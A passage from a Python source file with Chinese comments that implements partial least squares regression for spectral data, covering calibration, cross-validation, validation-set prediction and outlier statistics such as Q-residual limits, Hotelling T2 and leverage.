# ----------------- pretreat2 -----------------
if self.pretreat_method2 is not None:
self.pretreat4spec2 = eval(self.pretreat_method2.upper())()
self.pretreat4target = eval(self.pretreat_method2.upper() + '4Data')()
spec_pretreated2 = self.pretreat4spec2.fit_transform(spec_pretreated1)
target_pretreated = self.pretreat4target.fit_transform(target)
else:
self.pretreat4spec2 = 'None'
self.pretreat4target = 'None'
spec_pretreated2 = spec_pretreated1
target_pretreated = target
return spec_pretreated2, target_pretreated
def _spec_pretreat4transform(self, spec_matrix):
if self.pretreat_method1 is not None:
# pretreat4spec1 ---- eval(self.pretreat_method1)(**self.pretreat_params1)
# 实例对象
spec_pretreated1 = self.pretreat4spec1.transform(spec_matrix)
else:
spec_pretreated1 = spec_matrix
if self.pretreat_method2 is not None:
# pretreat4spec2 ---- eval(self.pretreat_method2)(**self.pretreat_params2)
# 实例对象
spec_pretreated2 = self.pretreat4spec2.transform(spec_pretreated1)
else:
spec_pretreated2 = spec_pretreated1
return spec_pretreated2
def _target_inverse_pretreat(self, target):
if self.pretreat_method2 is not None:
target_inverse_pretreated = self.pretreat4target.inverse_transform(target)
else:
target_inverse_pretreated = target
return target_inverse_pretreated
def _spec_target_pretreat_cv(self, spec_cv, target_cv):
# ----------------- pretreat1 -----------------
if self.pretreat_method1 is not None:
self.pretreat4spec1_cv = eval(self.pretreat_method1.upper())(**self.pretreat_params1) # 类的实例
spec_pretreated1_cv = self.pretreat4spec1_cv.fit_transform(spec_cv)
else:
self.pretreat4spec1_cv = 'None'
spec_pretreated1_cv = spec_cv
# 保存pretreat1预处理完的光谱的mean和stdev
self.calx_pretreated1_mean_cv = np.mean(spec_pretreated1_cv[1:, :], axis=0)
self.calx_pretreated1_stdev_cv = np.std(spec_pretreated1_cv[1:, :] - self.calx_pretreated1_mean_cv, axis=0, ddof=1)
# 保存y的mean和stdev
self.caly_mean_cv = np.mean(target_cv, axis=0)
caly_mc_cv = target_cv - self.caly_mean_cv
self.caly_stdev_cv = np.std(caly_mc_cv, axis=0, ddof=1)
# ----------------- pretreat2 -----------------
if self.pretreat_method2 is not None:
self.pretreat4spec2_cv = eval(self.pretreat_method2.upper())()
self.pretreat4target_cv = eval(self.pretreat_method2.upper() + '4Data')()
spec_pretreated2_cv = self.pretreat4spec2_cv.fit_transform(spec_pretreated1_cv)
target_pretreated_cv = self.pretreat4target_cv.fit_transform(target_cv)
else:
self.pretreat4spec2_cv = 'None'
self.pretreat4target_cv = 'None'
spec_pretreated2_cv = spec_pretreated1_cv
target_pretreated_cv = target_cv
return spec_pretreated2_cv, target_pretreated_cv
def _spec_pretreat4transform_cv(self, spec_matrix_cv):
if self.pretreat_method1 is not None:
# pretreat4spec1 ---- eval(self.pretreat_method1)(**self.pretreat_params1)
# 实例对象
spec_pretreated1_cv = self.pretreat4spec1_cv.transform(spec_matrix_cv)
else:
spec_pretreated1_cv = spec_matrix_cv
if self.pretreat_method2 is not None:
# pretreat4spec2 ---- eval(self.pretreat_method2)(**self.pretreat_params2)
# 实例对象
spec_pretreated2_cv = self.pretreat4spec2_cv.transform(spec_pretreated1_cv)
else:
spec_pretreated2_cv = spec_pretreated1_cv
return spec_pretreated2_cv
def _target_inverse_pretreat_cv(self, target_cv):
if self.pretreat_method2 is not None:
target_inverse_pretreated_cv = self.pretreat4target_cv.inverse_transform(target_cv)
else:
target_inverse_pretreated_cv = target_cv
return target_inverse_pretreated_cv
def calibration(self, calset_spec_intersect, calset_target, calset_indices=None):
if calset_target.ndim == 1:
calset_target = calset_target[:, np.newaxis] # 用于多维结果的broadcast计算
calset_ab_intersect = calset_spec_intersect[1:, :]
self.calx_mean = np.mean(calset_ab_intersect, axis=0)
n_samples = calset_ab_intersect.shape[0]
if calset_indices is None:
calset_indices = np.arange(n_samples)
# ------------- 光谱预处理,浓度预处理 -------------
spec, target = self._spec_target_pretreat(calset_spec_intersect, calset_target)
# ------------- 截取波长点 -------------
spec_subset = spec[:, self.variable_indices]
ab_subset = spec_subset[1:, :]
# ------------- 开始PLSR -------------
calplsr = PLSR(self.algorithm, self.max_nlv)
cal_result = calplsr.fit_predict(spec_subset, target)
b = cal_result['b']
fit_value_temp = cal_result['fit_value']
fit_value = self._target_inverse_pretreat(fit_value_temp)
pls_result = cal_result['pls_result']
x_loadings = cal_result['x_loadings']
x_scores = cal_result['x_scores']
x_scores_weights = cal_result['x_scores_weights']
# ------------- 开始统计指标计算 -------------
# -------- 光谱残差
q_result = q_calc(x_loadings, x_scores, ab_subset)
q = q_result['q']
x_residual = sqrt(q_result['q'])
residual_matrix_list = q_result['residual_matrix_list']
fitting_x_list = q_result['fitting_x_list']
x_sample_residuals = q_result['x_sample_residuals']
x_variable_residuals = q_result['x_variable_residuals']
x_total_residuals = q_result['x_total_residuals']
explained_x_sample_variance = q_result['explained_x_sample_variance']
explained_x_variable_variance = q_result['explained_x_variable_variance']
explained_x_total_variance = q_result['explained_x_total_variance']
explained_x_variance_ratio = q_result['explained_x_variance_ratio']
# ---- 计算t2_limit, t_critical_value, q_limit
sl = self.significance_level # 显著性水平
t2_limit = zeros((len(sl), self.max_nlv))
t_critical_value = zeros((len(sl), self.max_nlv)) # y_tvalue 学生化残差的临界值
q_limit = zeros((len(sl), self.max_nlv))
# refer to: Interpreting PLS plots
# The critical value of the Q-residuals are estimated from the eigenvalues of E, as described in Jackson and Mudholkar, 1979.
prevent_invalid_for_nan_warn = np.seterr(invalid='ignore')
eigenvalues_list = []
for lv in range(self.max_nlv):
e = q_result['residual_matrix_list'][lv]
U, S, V = np.linalg.svd(e, full_matrices=False)
eigenvalues_list.append(S ** 2 / (n_samples - 1)) # note the (n_samples - 1) part for unbiased estimate of var
for i in range(self.max_nlv): # 0:5 nlv
for j in range(len(sl)): # 不同显著性水平
# ---- t2_limit ----
nlv = i + 1
# .ppf的参数 q ---- lower tail probability
t2_limit_sl = nlv * (n_samples - 1) / (n_samples - nlv) * sps.f.ppf(1 - sl[j], nlv, n_samples - nlv)
t2_limit[j, i] = t2_limit_sl
# ---- 学生化残差临界值, t_critical_value双尾t检验, t.ppf((1 - sl[j]) / 2, df)
if self.pretreat_method2 is not None:
df = n_samples - nlv - 1
else:
df = n_samples - nlv
t_critical_value_sl = sps.t.ppf(1 - sl[j] / 2, df)
t_critical_value[j, i] = t_critical_value_sl
# ---- q_limit ----
evalues_unused = eigenvalues_list[i]
theta1 = np.sum(evalues_unused)
theta2 = np.sum(evalues_unused ** 2)
theta3 = np.sum(evalues_unused ** 3)
h0 = 1 - (2 * theta1 * theta3) / (3 * theta2 ** 2)
if h0 < 0.001:
h0 = 0.001
# .ppf的参数 q ---- lower tail probability
ca = sps.norm.ppf(1 - sl[j])
h1 = ca * sqrt(2 * theta2 * h0 ** 2) / theta1
h2 = theta2 * h0 * (h0 - 1) / (theta1 ** 2)
# 不同显著性水平
q_limit_sl = theta1 * (1 + h1 + h2) ** (1 / h0)
q_limit[j, i] = q_limit_sl
# -------- Leverage & Hotelling TSquared
leverage_t2_result = leverage_t2_calc(x_scores, x_scores)
leverage = leverage_t2_result['leverage']
leverage_limit = 3 * mean(leverage, axis=0)
t2 = leverage_t2_result['t2']
# x_Fvalue, x_Fprob ---- refer to OPUS
x_fvalue = (n_samples - 1) * x_residual ** 2 / (sum(square(x_residual), axis=0) - x_residual ** 2)
x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_samples - 1)
# y_Fvalue, y_Fprob ---- refer to OPUS
y_residual = fit_value - calset_target
y_fvalue = (n_samples - 1) * y_residual ** 2 / (sum(square(y_residual), axis=0) - y_residual ** 2)
y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_samples - 1)
# 计算r2, SEC, press, rpd, bias(全部隐变量)
sec_statistics_result = self._sec_calc(fit_value, calset_target)
r2 = sec_statistics_result['r2']
press = sec_statistics_result['press']
rmsec = sec_statistics_result['rmsec']
sec = sec_statistics_result['sep']
rpd = sec_statistics_result['rpd']
bias = sec_statistics_result['bias']
linear_regression_coefficient = sec_statistics_result['linear_regression_coefficient']
relative_error = sec_statistics_result['relative_error']
# ---- 20190115增加y_tvalue(学生化残差)
prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
y_tvalue = y_residual / (rmsec * sqrt(1 - leverage))
# ---- outlier detect
outlier_dectect_result = outlier_detect(leverage, leverage_limit, y_fprob, calset_indices)
x_outlier_indices_list = outlier_dectect_result['x_outlier_indices_list']
y_outlier_indices_list = outlier_dectect_result['y_outlier_indices_list']
just_x_outlier_list = outlier_dectect_result['just_x_outlier_list']
just_y_outlier_list = outlier_dectect_result['just_y_outlier_list']
both_xy_outlier_list = outlier_dectect_result['both_xy_outlier_list']
########################## 预测需要 ##########################
# calx_mean, calx_pretreated1_mean, calx_pretreated1_stdev,
# caly_mean, caly_stdev, b, calx_loadings, calx_scores, calx_scores_weights,
# leverage_limit, testset_indices = None
model_parameters = {'pretreat_method1':self.pretreat_method1,
'pretreat_params1':self.pretreat_params1,
'pretreat_method2':self.pretreat_method2,
'calx_mean':self.calx_mean,
'calx_pretreated1_mean':self.calx_pretreated1_mean,
'calx_pretreated1_stdev':self.calx_pretreated1_stdev,
'caly_mean':self.caly_mean,
'caly_stdev':self.caly_stdev,
'b':b,
'calx_loadings':x_loadings,
'calx_scores':x_scores,
'calx_scores_weights':x_scores_weights,
'leverage_limit':leverage_limit,
't2_limit':t2_limit,
'q_limit':q_limit,
'variable_indices':self.variable_indices}
return {'b':b,
'fit_value': fit_value,
'y_residual': y_residual,
'x_residual': x_residual,
'fitting_x_list': fitting_x_list,
'residual_matrix_list': residual_matrix_list,
'x_sample_residuals': x_sample_residuals,
'x_variable_residuals': x_variable_residuals,
'x_total_residuals': x_total_residuals,
'explained_x_sample_variance': explained_x_sample_variance,
'explained_x_variable_variance': explained_x_variable_variance,
'explained_x_total_variance': explained_x_total_variance,
'explained_x_variance_ratio': explained_x_variance_ratio,
'pls_result': pls_result,
't2': t2,
't2_limit':t2_limit,
'leverage': leverage,
'leverage_limit': leverage_limit,
'q': q,
'q_limit': q_limit,
'x_loadings': x_loadings,
'x_scores': x_scores,
'x_scores_weights': x_scores_weights,
'x_fvalue': x_fvalue,
'x_fprob': x_fprob,
'y_fvalue': y_fvalue,
'y_fprob': y_fprob,
'y_tvalue': y_tvalue, # 学生化残差
't_critical_value': t_critical_value, # 学生化残差阈值
'r2': r2,
'press': press,
'rmsec': rmsec,
'sec': sec,
'rpd': rpd,
'bias':bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error,
'x_outlier_indices_list': x_outlier_indices_list,
'y_outlier_indices_list': y_outlier_indices_list,
'just_x_outlier_list': just_x_outlier_list,
'just_y_outlier_list': just_y_outlier_list,
'both_xy_outlier_list': both_xy_outlier_list,
'model_parameters':model_parameters}
def cv(self, calset_spec_intersect, calset_target, cv_sampling_method='cv_lpo_systematic_sampling',
sampling_param={'p': 3}, calset_indices=None):
'''
Cross PLSValidation
:return:
'''
if calset_target.ndim == 1:
calset_target = calset_target[:, np.newaxis] # 用于多维结果的broadcast计算
self.cv_sampling_method = cv_sampling_method
self.sampling_param=sampling_param
self.calset_target = calset_target
self.calset_spec_intersect = calset_spec_intersect
self.calset_wavelength_intersect = self.calset_spec_intersect[0, :]
self.calset_ab_intersect = self.calset_spec_intersect[1:, :]
n_cal_samples = self.calset_spec_intersect.shape[0] - 1
if calset_indices is None:
calset_indices = np.arange(n_cal_samples)
# -------- 处理variable_indices (indices针对intersect, 而非全谱) --------
# 手工选择的谱区或BIPLS得到的谱区; 如果是离散的波长点,则事先已经得到
if self.customized_regions is not None:
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
else:
self.customized_regions = [[self.calset_wavelength_intersect[0], self.calset_wavelength_intersect[-1]]]
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
# 处理维数过大的问题
if self.max_nlv > np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size)):
self.max_nlv = np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size))
n_variables = self.variable_indices.size
# =========================== Calibration start ===========================
self.cal_result = self.calibration(self.calset_spec_intersect, self.calset_target, calset_indices=calset_indices)
calx_scores = self.cal_result['x_scores']
leverage_limit = self.cal_result['leverage_limit']
# =========================== Calibration end ===========================
# =========================== Cross PLSValidation start ===========================
x = self.calset_ab_intersect
y = self.calset_target
# -------- 交叉验证划分集合 --------
train_indices_list, test_indices_list = eval(self.cv_sampling_method)(n_cal_samples, **self.sampling_param)
n_fold = len(train_indices_list)
cv_predict_value = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的预测结果
cv_x_residual = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的光谱残差
cv_y_residual = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的预测残差
cv_x_scores = zeros((n_cal_samples, self.max_nlv)) # 列出所有样本各个维数的得分
cv_residual_matrix = zeros((self.max_nlv, n_cal_samples, n_variables)) # 三维数组(nlv, m, n)
cv_fitting_x = zeros((self.max_nlv, n_cal_samples, n_variables)) # 三维数组(nlv, m, n)
cv_ab_pretreated = zeros((n_cal_samples, n_variables)) # 存储每个交叉验证中预处理后的样品
cv_q = zeros((n_cal_samples, self.max_nlv))
# ======================== 开始交叉验证 ========================
for i in range(n_fold):
calx_cv, caly_cv = x[train_indices_list[i], :], y[train_indices_list[i]]
valx_cv, valy_cv = x[test_indices_list[i], :], y[test_indices_list[i]]
# --------- 区分了校正子集和预测子集,开始光谱和组分预处理 ---------
calspec_cv = np.vstack((self.calset_wavelength_intersect, calx_cv))
valspec_cv = np.vstack((self.calset_wavelength_intersect, valx_cv))
calspec_cv_pretreated, caly_cv_pretreated = self._spec_target_pretreat_cv(calspec_cv, caly_cv)
valspec_cv_pretreated = self._spec_pretreat4transform_cv(valspec_cv)
# --------- 根据variable indices, 截取波长点, 开始计算 ---------
calspec_subset = calspec_cv_pretreated[:, self.variable_indices]
valspec_subset = valspec_cv_pretreated[:, self.variable_indices]
valx_subset = valspec_subset[1:, :]
sub_plsr = PLSR(algorithm=self.algorithm, max_nlv=self.max_nlv)
sub_plsr.fit(calspec_subset, caly_cv_pretreated) # 只需要fit
sub_pls_result = sub_plsr.pls_result
calx_loadings_cv = sub_pls_result['x_loadings']
# calx_scores_cv = sub_pls_result['x_scores']
calx_scores_weights_cv = sub_pls_result['x_scores_weights']
# --------- val_predict_value_temp 根据pretreat_method2做inverse_transform---------
val_predicte_value_temp = sub_plsr.val_predict(valspec_subset)['predict_value']
val_predict_value = self._target_inverse_pretreat_cv(val_predicte_value_temp)
val_y_residual = val_predict_value - valy_cv
cv_predict_value[test_indices_list[i], :] = val_predict_value
# ---------- 部分统计指标 ----------
val_x_scores = dot(valx_subset, calx_scores_weights_cv)
cv_x_scores[test_indices_list[i], :] = val_x_scores
# ---- 光谱残差
cv_ab_pretreated[test_indices_list[i], :] = valx_subset # 用于计算explained_x_total_variance
val_q_result = q_calc_cv(calx_loadings_cv, val_x_scores, valx_subset)
val_q = val_q_result['q']
val_x_residual = sqrt(val_q_result['q'])
val_residual_matrix_list = val_q_result['residual_matrix_list'] # 等待存储
val_fitting_x_list = val_q_result['fitting_x_list'] # 等待存储
for j in range((self.max_nlv)): # 存入三维数组
cv_residual_matrix[j, test_indices_list[i], :] = val_residual_matrix_list[j]
cv_fitting_x[j, test_indices_list[i], :] = val_fitting_x_list[j]
cv_q[test_indices_list[i], :] = val_q
# ---- 处理 x_residual 与 y_residual
cv_x_residual[test_indices_list[i], :] = val_x_residual
cv_y_residual[test_indices_list[i], :] = val_y_residual
# ---------------- 交叉验证完毕,统一计算 ----------------
# ---- x_variable_residuals 和 x_total_residuals
cv_x_sample_residuals = np.sum(cv_residual_matrix ** 2, axis=2).T / n_variables
cv_x_variable_residuals = np.sum(cv_residual_matrix ** 2, axis=1).T / n_cal_samples # (n_variables, n_lv)
cv_x_total_residuals = np.mean(cv_x_variable_residuals, axis=0, keepdims=True) # (1, n_lv)
cv_explained_x_sample_variance = (1 - cv_x_sample_residuals / \
(np.sum(cv_ab_pretreated ** 2, axis=1, keepdims=True) / n_variables)) * 100
cv_explained_x_variable_variance = (1 - cv_x_variable_residuals.T /
(np.sum(cv_ab_pretreated ** 2, axis=0) / n_cal_samples)) * 100
cv_explained_x_total_variance = (1 - cv_x_total_residuals / np.mean(cv_ab_pretreated ** 2)) * 100
cv_explained_x_variance_ratio = np.hstack((cv_explained_x_total_variance[:, 0:1],
np.diff(cv_explained_x_total_variance)))
# ---- 将 cv_residual_matrix 和 cv_fitting_x 三维数组重新处理成list
cv_residual_matrix_list = [cv_residual_matrix[i, :, :] for i in range(self.max_nlv)]
cv_fitting_x_list = [cv_fitting_x[i, :, :] for i in range(self.max_nlv)]
# ---- Leverage & Hotelling TSquared (20190120 OK)
leverage_t2_result = leverage_t2_calc_cv(cv_x_scores, calx_scores)
cv_leverage = leverage_t2_result['leverage']
cv_t2 = leverage_t2_result['t2']
# 计算x_residual的fvalue和fprob
x_fvalue = (n_cal_samples - 1) * cv_x_residual ** 2 / (
sum(square(cv_x_residual), axis=0) - cv_x_residual ** 2)
x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_cal_samples - 1)
# 计算y_residual的fvalue和fprob
y_fvalue = (n_cal_samples - 1) * cv_y_residual ** 2 / (
sum(square(cv_y_residual), axis=0) - cv_y_residual ** 2)
y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_cal_samples - 1)
# 计算r2, rmsecv, press, rpd, bias(全部维数)
rmse_statistics = rmse_calc(cv_predict_value, self.calset_target)
r2 = rmse_statistics['r2']
rmsecv = rmse_statistics['rmse']
secv = rmse_statistics['sep']
press = rmse_statistics['press']
rpd = rmse_statistics['rpd']
bias = rmse_statistics['bias']
linear_regression_coefficient = rmse_statistics['linear_regression_coefficient']
relative_error = rmse_statistics['relative_error']
# ---- 20190128增加y_tvalue(学生化残差)
prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
y_tvalue = cv_y_residual / (rmsecv * sqrt(1 - cv_leverage)) # 20190128 与 Unscrambler 保持一致, 除以RMSECV
# 推荐维数
min_press = min(press)
press_fvalue = press / min_press
press_fprob = sps.distributions.f.cdf(press_fvalue, n_cal_samples, n_cal_samples)
if np.all(press_fprob >= 0.75):
self.optimal_nlv = self.max_nlv
else:
self.optimal_nlv = np.where(press_fprob < 0.75)[0][0] + 1
optimal_rmsecv = rmsecv[self.optimal_nlv - 1]
# ======== outlier 检测 ========
outlier_dectect_result = outlier_detect(cv_leverage, leverage_limit, y_fprob, calset_indices)
x_outlier_indices_list = outlier_dectect_result['x_outlier_indices_list']
y_outlier_indices_list = outlier_dectect_result['y_outlier_indices_list']
just_x_outlier_list = outlier_dectect_result['just_x_outlier_list']
just_y_outlier_list = outlier_dectect_result['just_y_outlier_list']
both_xy_outlier_list = outlier_dectect_result['both_xy_outlier_list']
# ======== 保存cv结果 ========
cv_result = {'predict_value': cv_predict_value,
'x_residual': cv_x_residual,
'y_residual': cv_y_residual,
'fitting_x_list': cv_fitting_x_list,
'residual_matrix_list': cv_residual_matrix_list,
'x_sample_residuals': cv_x_sample_residuals,
'x_variable_residuals': cv_x_variable_residuals,
'x_total_residuals': cv_x_total_residuals,
'explained_x_sample_variance': cv_explained_x_sample_variance,
'explained_x_variable_variance': cv_explained_x_variable_variance.T,
'explained_x_total_variance': cv_explained_x_total_variance,
'explained_x_variance_ratio': cv_explained_x_variance_ratio,
'leverage': cv_leverage,
't2': cv_t2,
'q': cv_q,
'x_scores': cv_x_scores,
'x_fvalue': x_fvalue,
'x_fprob': x_fprob,
'y_fvalue': y_fvalue,
'y_fprob': y_fprob,
'y_tvalue': y_tvalue, # 学生化残差
'r2': r2,
'rmsecv': rmsecv,
'secv': secv,
'optimal_nlv': self.optimal_nlv,
'optimal_rmsecv': optimal_rmsecv,
'press': press,
'rpd': rpd,
'bias': bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error,
'x_outlier_indices_list': x_outlier_indices_list,
'y_outlier_indices_list': y_outlier_indices_list,
'just_x_outlier_list': just_x_outlier_list,
'just_y_outlier_list': just_y_outlier_list,
'both_xy_outlier_list': both_xy_outlier_list}
return {'cv_result': cv_result, 'cal_result': self.cal_result}
def vv(self, calset_spec_intersect, calset_target, valset_spec_intersect, valset_target,
calset_indices=None, valset_indices=None):
'''
Valset PLSValidation, 利用校正集校正,预测验证集,得出最佳nlv
:return:
'''
if calset_target.ndim == 1:
calset_target = calset_target[:, np.newaxis] # 用于多维结果的broadcast计算
if valset_target.ndim == 1:
valset_target = valset_target[:, np.newaxis] # 用于多维结果的broadcast计算
self.calset_target = calset_target
self.valset_target = valset_target
self.calset_spec_intersect = calset_spec_intersect
self.calset_wavelength_intersect = self.calset_spec_intersect[0, :]
self.calset_ab_intersect = self.calset_spec_intersect[1:, :]
self.valset_spec_intersect = valset_spec_intersect
self.valset_wavelength_intersect = self.valset_spec_intersect[0, :]
self.valset_ab_intersect = self.valset_spec_intersect[1:, :]
# -------- 处理variable_indices (indices针对intersect, 而非全谱) --------
if self.customized_regions is not None:
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
else:
self.customized_regions = [[self.calset_wavelength_intersect[0], self.calset_wavelength_intersect[-1]]]
self.verified_regions = verify_customized_regions(self.calset_wavelength_intersect, self.customized_regions)
self.variable_indices = generate_variable_indices(self.calset_wavelength_intersect, self.customized_regions)
# 处理维数过大的问题
if self.max_nlv > np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size)):
self.max_nlv = np.min((self.calset_spec_intersect.shape[0] - 1, self.variable_indices.size))
# =========================== Calibration start ===========================
self.cal_result = self.calibration(self.calset_spec_intersect, self.calset_target, calset_indices=calset_indices)
leverage_limit = self.cal_result['leverage_limit']
calx_loadings = self.cal_result['x_loadings']
calx_scores = self.cal_result['x_scores']
calx_scores_weights = self.cal_result['x_scores_weights']
b = self.cal_result['b']
# =========================== Calibration end ===========================
# =========================== Valset PLSValidation start ===========================
n_val_samples = self.valset_ab_intersect.shape[0]
# ------------------ 验证集光谱预处理 ------------------
valspec_pretreated = self._spec_pretreat4transform(self.valset_spec_intersect)
# --------- 根据variable indices, 截取波长点 ---------
valspec_subset = valspec_pretreated[:, self.variable_indices]
valx_subset = valspec_subset[1:, :]
# --------- 开始预测 ---------
val_predicte_value_temp = dot(valx_subset, b)
val_predict_value = self._target_inverse_pretreat(val_predicte_value_temp)
val_y_residual = val_predict_value - self.valset_target
# ---------- 统计指标 ----------
val_x_scores = dot(valx_subset, calx_scores_weights)
# -------- Leverage & Hotelling TSquared
leverage_t2_result = leverage_t2_calc(val_x_scores, calx_scores)
val_leverage = leverage_t2_result['leverage']
val_t2 = leverage_t2_result['t2']
if n_val_samples < 2:
# 保存vv结果
vv_result = {'predict_value': val_predict_value,
'x_scores': val_x_scores,
'leverage': val_leverage,
't2': val_t2,
'y_residual': val_y_residual}
else:
# --------------- 验证完毕,统一计算 ---------------
# ---- 光谱残差
val_q_result = q_calc(calx_loadings, val_x_scores, valx_subset)
val_q = val_q_result['q']
val_f_residuals = val_q_result['f_residuals']
val_x_residual = sqrt(val_q_result['q'])
val_residual_matrix_list = val_q_result['residual_matrix_list']
val_fitting_x_list = val_q_result['fitting_x_list']
val_x_sample_residuals = val_q_result['x_sample_residuals']
val_x_variable_residuals = val_q_result['x_variable_residuals']
val_x_total_residuals = val_q_result['x_total_residuals']
val_explained_x_sample_variance = val_q_result['explained_x_sample_variance']
val_explained_x_variable_variance = val_q_result['explained_x_variable_variance']
val_explained_x_total_variance = val_q_result['explained_x_total_variance']
val_explained_x_variance_ratio = val_q_result['explained_x_variance_ratio']
# ---- 计算x_residual的fvalue和fprob
x_fvalue = (n_val_samples - 1) * val_x_residual ** 2 / (sum(square(val_x_residual), axis=0) - val_x_residual ** 2)
x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_val_samples - 1)
# 计算y_residual的fvalue和fprob
y_fvalue = (n_val_samples - 1) * val_y_residual ** 2 / (sum(square(val_y_residual), axis=0) - val_y_residual ** 2)
y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_val_samples - 1)
# 计算r2, rmsecv, press, rpd, bias(全部维数)
rmse_statistics = rmse_calc(val_predict_value, self.valset_target)
r2 = rmse_statistics['r2']
rmsep = rmse_statistics['rmse']
sep = rmse_statistics['sep']
press = rmse_statistics['press']
rpd = rmse_statistics['rpd']
bias = rmse_statistics['bias']
linear_regression_coefficient = rmse_statistics['linear_regression_coefficient']
relative_error = rmse_statistics['relative_error']
# ---- 20190128增加y_tvalue(学生化残差)
prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
y_tvalue = val_y_residual / (rmsep * sqrt(1 - val_leverage)) # 20190128 与 Unscrambler 保持一致, 除以RMSEP
# 推荐维数
min_press = min(press)
press_fvalue = press / min_press
press_fprob = sps.distributions.f.cdf(press_fvalue, n_val_samples, n_val_samples)
if np.all(press_fprob >= 0.75) :
self.optimal_nlv = self.max_nlv
else:
self.optimal_nlv = np.where(press_fprob < 0.75)[0][0] + 1
optimal_rmsep = rmsep[self.optimal_nlv - 1]
# ======== outlier 检测 ========
outlier_dectect_result = outlier_detect(val_leverage, leverage_limit, y_fprob, valset_indices)
x_outlier_indices_list = outlier_dectect_result['x_outlier_indices_list']
y_outlier_indices_list = outlier_dectect_result['y_outlier_indices_list']
just_x_outlier_list = outlier_dectect_result['just_x_outlier_list']
just_y_outlier_list = outlier_dectect_result['just_y_outlier_list']
both_xy_outlier_list = outlier_dectect_result['both_xy_outlier_list']
# 保存vv结果
vv_result = {'predict_value': val_predict_value,
'x_scores': val_x_scores,
'leverage': val_leverage,
't2': val_t2,
'q': val_q,
'val_f_residuals': val_f_residuals,
'y_residual': val_y_residual,
'x_residual': val_x_residual,
'fitting_x_list': val_fitting_x_list,
'residual_matrix_list': val_residual_matrix_list,
'x_sample_residuals': val_x_sample_residuals,
'x_variable_residuals': val_x_variable_residuals,
'x_total_residuals': val_x_total_residuals,
'explained_x_sample_variance': val_explained_x_sample_variance,
'explained_x_variable_variance': val_explained_x_variable_variance,
'explained_x_total_variance': val_explained_x_total_variance,
'explained_x_variance_ratio': val_explained_x_variance_ratio,
'x_fvalue': x_fvalue,
'x_fprob': x_fprob,
'y_fvalue': y_fvalue,
'y_fprob': y_fprob,
'y_tvalue': y_tvalue, # 学生化残差
'r2': r2,
'rmsep': rmsep,
'sep': sep,
'optimal_nlv': self.optimal_nlv,
'optimal_rmsep': optimal_rmsep,
'press': press,
'rpd': rpd,
'bias': bias,
'linear_regression_coefficient': linear_regression_coefficient,
'relative_error': relative_error,
'x_outlier_indices_list': x_outlier_indices_list,
'y_outlier_indices_list': y_outlier_indices_list,
'just_x_outlier_list': just_x_outlier_list,
'just_y_outlier_list': just_y_outlier_list,
'both_xy_outlier_list': both_xy_outlier_list,
'residual_matrix_list': val_residual_matrix_list,
'fitting_x_list': val_fitting_x_list}
return {'vv_result': vv_result, 'cal_result': self.cal_result}
def predict(self, testset_spec_intersect, nlv=None, testset_indices=None, testset_target=None):
if nlv is None:
self.nlv = self.optimal_nlv
else:
self.nlv = nlv
self.testset_spec_intersect = testset_spec_intersect
n_test_samples = self.testset_spec_intersect.shape[0] - 1
# --------- 根据隐变量数,生成预测所需参数 ---------
model_parameters = self.cal_result['model_parameters']
b = model_parameters['b'][:, self.nlv - 1]
calx_loadings = model_parameters['calx_loadings'][:, :self.nlv] # 保存0 ~ opt_nlv-1
calx_scores = model_parameters['calx_scores'][:, :self.nlv] # 保存0 ~ opt_nlv-1
calx_scores_weights = model_parameters['calx_scores_weights'][:, :self.nlv] # 保存0 ~ opt_nlv-1
leverage_limit = model_parameters['leverage_limit'][self.nlv - 1] # 保存0 ~ opt_nlv-1
if b.ndim == 1:
b = b[:, np.newaxis]
if testset_indices is None:
testset_indices = np.arange(n_test_samples)
# --------- 测试集光谱预处理 ---------
testspec_pretreated = self._spec_pretreat4transform(self.testset_spec_intersect)
# --------- 根据variable indices, 截取波长点 ---------
testspec_subset = testspec_pretreated[:, self.variable_indices]
testx_subset = testspec_subset[1:, :]
# --------- 开始预测 ---------
predicte_value_temp = dot(testx_subset, b)
predict_value = self._target_inverse_pretreat(predicte_value_temp)
# ===================== 统计指标 =====================
test_x_scores = dot(testx_subset, calx_scores_weights)
# ---- Leverage & Hotelling TSquared leverage_t2_calc(scores, x_scores)
leverage_t2_result = leverage_t2_calc(test_x_scores, calx_scores)
leverage = leverage_t2_result['leverage'][:, -1:]
t2 = leverage_t2_result['t2'][:, -1:]
if testset_target is None or n_test_samples < 2:
return {'predict_value': predict_value,
'x_scores': test_x_scores,
't2': t2,
'leverage': leverage}
else:
# ---- 光谱残差
test_q_result = q_calc(calx_loadings, test_x_scores, testx_subset)
fitting_x_matrix = test_q_result['fitting_x_list'][-1] # 提取最后1个元素
residual_matrix = test_q_result['residual_matrix_list'][-1] # 提取最后1个元素 (n_test_samples, n_variables)
test_q = test_q_result['q'][:, -1:]
test_x_residual = sqrt(test_q_result['q'][:, -1:]) # 提取最后1列
if testset_target.ndim == 1:
testset_target = testset_target[:, np.newaxis]
# ---- x_fvalue and x_fprob
x_fvalue = (n_test_samples - 1) * test_x_residual ** 2 / \
(sum(square(test_x_residual), axis=0) - test_x_residual ** 2)
x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_test_samples - 1)
